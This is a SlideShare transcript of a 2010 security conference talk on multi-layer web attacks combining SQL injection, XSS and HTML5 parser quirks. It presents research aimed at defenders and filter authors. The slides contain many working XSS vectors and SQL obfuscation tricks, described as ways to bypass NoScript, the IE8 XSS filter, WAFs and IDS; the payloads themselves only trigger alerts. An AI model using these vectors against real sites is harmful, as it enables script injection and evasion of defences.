SlideShare una empresa de Scribd logo

Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5

Mario Heiderich
Mario Heiderich

This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.

Tecnología
1 de 36
Descargar para leer sin conexión
The Presence and Future of Web Attacks Multi-Layer Attacks, XSSQLI+ and HTML5 A presentation by Mario Heiderich for CONFidence 2010, Krakow
WARNING This talk will be technical, chaotic and|or hurt
Intro Mario Heiderich @0x6D6172696F  Based in Cologne  CTO for Business IN Inc - working on workube.com  Independent Security Researcher  PHPIDS and something we will see later on
Why this talk?  What happened to web application security?  Always the same... so 2002 right?  XSS, SQL Injections, Auth and path traversal  We have amazing things now!  NoScript, the IE8 and Chromium XSS filter and CSP  Users must be safer than ever!  But didn't the web change?  Wasn't there HTML5 and next generation browsers?
Oh wait - developers!  Web app development frameworks help  Building applications faster  Pre-implemented SQLI and XSS protection  Secure forms with complex CSRF tokens  Webroot contains webroot only files  Weaknesses regarding JavaScript generation  Client side logic mostly built manually  Different templates for browsers, mobile devices, feeds  Offline mode, client side validation, DOM access
User Agents on steroids  Chrome 5 and Opera 10.5 ship client side databases  IE9 is coming soon with more standards conformity  Integrated security mechanisms  The death of eval()  A fat client dynasty is coming up  Who needs a server anyway if clients do all the work  And store their data in „the cloud“   Bye bye SQL - say hello to NoSQL?
Web applications are changing  And so are the attacks against them  If the attack happens on and against the client  Of what use will a server side IDS / WAF solution be?  Today we can have a little preview for that scenario  One question might be...  How will protective mechanisms react on multi-layer attacks?
Multi-layer what?  What about utilizing the DBMS to generate an XSS attack  NoScript detects most XSS attacks without problems  Circumvention has become very difficult  Thanks to Giorgio Maone and the NoScript user base. And me :P  Let's have a look at my last one (disclosed via SSD - fixed in 1.9.9.48)  Aren't dataURIs the sweetest thing?  <a href="d&#097t&#x0061: . &#x2c &#x25;  3  c s cri &#x00D; pt % 3 e alu0065rt(1)%3c  /s &#x43 RI &#x009 P t>"
Difficult!  We can probably agree that it's not as easy anymore  Same thing for the IE8 XSS filter  Or implementations of toStaticHTML()  Most quirky JavaScript encoding techniques are documented  Not too many user agent specific surprises anymore    Help from another layer would be appreciated  Let's have a look at a "classic webapp" example
Imagine the DBMS helps  Hypothesis  A verbose SQL Injection vulnerability is always at least an "unfilterable" XSS  Verification  Just make use of the obfuscation possibilities the DBMS provides  SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E  SELECT UpdateXML(concat( 0x3c,'script',0x3e,'alert(1)',0x3c,'/ script',0x3e), '/x', 0);  SELECT/**/'<sc'"rip"'t>al'"er"'t(1)'"</sc"'ript>'
MySQL and PostgreSQL  MySQL only ships two basic XML functions  UpdateXML() and ExtractValue()  PostgreSQL has far more advanced XML support  SELECT xmlelement(name img,xmlattributes(1 as src,'alert(1)'as onerror))  SELECT xmlforest(loWER('x41'||'lert(1)') AS script);  And my favorite  SELECT xpath('//text()', '<x:x>&#x3c;imgx20src=x onerror=alert(1);&#x2f;&#x2f;</x:x>', ARRAY[ARRAY['x', '']]);
SQL Injection and XSS  There are more intersections for XSS and SQLI  „Remember“ the client side databases?  And the short lived Google Gears?  HTML5 and W3C Offline Web Applications 1.0 give us window.openDatabase()  SQL execution on the user agent  Currently supported by Chrome and Opera  Usually implemented using SQLite
Code please <script type="text/javascript"> openDatabase('',1,1,0).transaction(function($){ $.executeSql( 'SELECT "x61lert(1u0029"', [], function($,results){ for(i in results.rows.item(0)) eval(results.rows.item(0)[i]) }) }) </script>  Selects the string "alert(1)"  And evaluates the result
Short Roundup  The browsers speak SQL now  The server side DBMS can generate HTML and JavaScript  We already outsmarted NoScript and IE8 XSS filter  Not really a fair game though  Multi-layer attacks mean multi-layer obfuscation  In future webapps the client side DBMS will generate our XSS payload     But today we still have to trick the server side protection  Bypass IDS and WAF with a trigger
Attackers like obfuscation  And why wouldn't they - right?  Obfuscation usually means concatenation  And a bit of encoding spice  But how to concatenate in SQL so no one will notice the attack?  Which operator to choose?  Everybody knows chr(), char() and double-pipe...
In MySQL - none at all  MySQL doesn't need parenthesis to concatenate  And doesn't know the double-pipe operator  Sorry mod_security...  But luckily MySQL accepts concatenation via whitespace  SELECT "a" "d" "m" "i" "n"  SELECT'a'"d"'m'"i"'n'  Or why not use an integer overflow in char()  SELECT concat( char( x'70617373', b'1110111011011110111001001100100'))
So again...  We can bypass the server side protection mechanisms  As well as client side tools  No parenthesis or special operators needed on MySQL  We can also trick MySQL and the IDS with MySQL specific code  SELECT--/*!500005,*//*!400004,*//*!300003,*/
Back to the user agent  But what if no server side DBMS is involved in the attack  What if the client side database is being targeted  We still need to execute some JavaScript bypassing either server side IDS and the client side security mechanisms  Let's have a look at some freaky examples
Remember dataURIs?  The whole requested resource embedded in the URI  DataURIs work smoothly on Firefox, Opera and Chrome  But IE8 and 9 have problems  Some say the minimal dataURI support was just for ACID 2
People say...  ...it's not possible to execute JavaScript via dataURI on IE  Do we agree on that?  No we don't!  <style> @import "data:,*%7bx:expression(write(2))%7D"; </style>  <link rel="Stylesheet" href="data:,* %7bx:expression(write(4))%7d">
And there's more  CSS expression() is believed to be dead on IE8  But it isn't  It's only disabled in standard mode  In case a recognized DOCTYPE is present  The new HTML5 doctype isn't  So this works: <!docytpe html> <div style="background:url('abc', x!=x=expression(write(2));)">
And even worse...  HTML5 forces user agents to be more tolerant again  New tags, new attributes, new parsing rules  And tons of new features like the mentioned openDatabase()  Some nifty examples from the future  <video/poster=javascript:alert(1)// Opera 10.5+  <style>@import javascript:alert(1); // IE9 (!)
Closing tags + free 0day  Another weird artifact has been reported for IE6 some years ago  It's attributes in closing HTML tags  Believed to be dead... but  This still works on all IEs  <td>phoobar</td style=expression(write(1))>  And what about this?  <style>*{background:url(foo!!- =expression(write(1));</style>
Opera CSS XSS  Since Mozilla fixed the dataURI and cross domain problems with -moz-binding IE was believed to be unique  Unique regarding JavaScript execution via CSS  But Opera ships an artifact too  <style>*{-o-link:'javascript:alert(1)';-o-link- source:current}</style>
Now we have...  Server side SQL helping to circumvent client side XSS filters  Effective SQL obfuscation circumventing WAF and IDS  "Obfuscation-mash ups" using several layers  Quirky HTML triggers to execute the JS  Sounds like only one player is missing  Even more freaky markup obfuscation! Awesome! Now breathe..
Meet Harold the markup ghoul This is Harold: 1;--<?f><l ₩ :!!:x /style=`b&#x5c;65h0061vIor/ĸ :url(#def&#x61ult#time2)ö/';'` ₩ /onb egin= &#x5bµ=u00&#054;1le&#114t&#40&#x31)&# x5d&#x2f/&#xyŧ>  It's completely legitimate to call me a mad man now and say this is never gonna work  So - demo time: http://heideri.ch/jso/what???
What... what is this?  It's a piece of markup – obfuscated to the max  Working on IE only – but all versions from 5 to 9  Based on the HTML+TIME API (What? Stuff like that still exists?)  Does your WAF know what to do with it?  Overall about 12-13 obfuscation steps  Buy me a beer later on and I will give you a full explanation :D
Round Up  We are not living in web app = CRUD application times anymore  Modern webapps accept input from many channels  User input via HTTP is just one of them  API calls, RPC, DOM, Drag&Drop, file meta data & EXIF...  WAF/IDS as well as pentesters need to look into HTML5  New application structures and design pattern must be understood  Client and server versus rich-client and cloud  SQLite and NVP versus RDBMS  Massive client diversity via mobile devices
Expectations and tasks  Fewer basic and reflective XSS  More out-of-band attacks and heavy obfuscation  We didn't even cover Flash and PDF  More JSON and E4X hijacking  SVG based attacks and rogue multimedia objects  Don't ignore the user agent  Understand client side obfuscation and multi-layer obfuscation  Don't trust filters. Ever.  We broke HTMLPurifier and most other markup filters some days ago with one single vector  And don't trust the cloud – it's a business model and not your buddy :D
So what can I do?  Help with research and participation!  Communication and disclosure  For good!  But how?
The Ultimate Cheatsheet  http://heideri.ch/jso
Ping us!  Add new vectors  Get a channel to speak to vendors  Most are more responsive than one might think  Use it for..  Your own scanner software  Your own local version  Whatever you want!  Open API in JSON  Multiple languages  Flexible payload  You need more? Tell us!
Do what now?  Go here!  http://code.google.com/p/html5security/
Questions & Comments  Thanks very much for listening!  Wait - no goodies this time? Meh!!1
Yaaaaaaay! Goodies!  Did you know Firefox has a DOM object called crypto?  PKI meets JavaScript  And another eval() for free!  crypto.generateCRMFRequest( 'CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use' );
Good bye!

Recomendados

The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 

Recomendados

The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyKevin Hakanson
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 
How to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityHow to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityYurii Bilyk
 

Más contenido relacionado

La actualidad más candente

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyKevin Hakanson
 

La actualidad más candente (20)

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web Cryptography
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 

Destacado

I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 
How to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityHow to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityYurii Bilyk
 
How-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the HoodHow-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the HoodYurii Bilyk
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonSimon Bennetts
 
Alert logic anatomy owasp infographic
Alert logic anatomy owasp infographicAlert logic anatomy owasp infographic
Alert logic anatomy owasp infographicCMR WORLD TECH
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application VulnerabilitiesPreetish Panda
 
Anatomy of an Attack
Anatomy of an AttackAnatomy of an Attack
Anatomy of an Attackspoofyroot
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
BlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo TalkBlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo TalkSimon Bennetts
 
Using the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolUsing the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolDavid Sweigert
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks Ajay Ohri
 
2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and Fuzzing2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and FuzzingSimon Bennetts
 
2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting Started2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting StartedSimon Bennetts
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
cmd injection
cmd injectioncmd injection
cmd injectionhackstuff
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack PresentationKhoa Nguyen
 

Destacado (20)

I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 
How to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityHow to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole City
 
How-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the HoodHow-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the Hood
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP Hackathon
 
Ddos dos
Ddos dosDdos dos
Ddos dos
 
Alert logic anatomy owasp infographic
Alert logic anatomy owasp infographicAlert logic anatomy owasp infographic
Alert logic anatomy owasp infographic
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Anatomy of an Attack
Anatomy of an AttackAnatomy of an Attack
Anatomy of an Attack
 
Web attacks
Web attacksWeb attacks
Web attacks
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
BlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo TalkBlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo Talk
 
Using the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolUsing the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing tool
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks
 
2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and Fuzzing2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and Fuzzing
 
2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting Started2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting Started
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 
cmd injection
cmd injectioncmd injection
cmd injection
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
 

Similar a Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5

Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
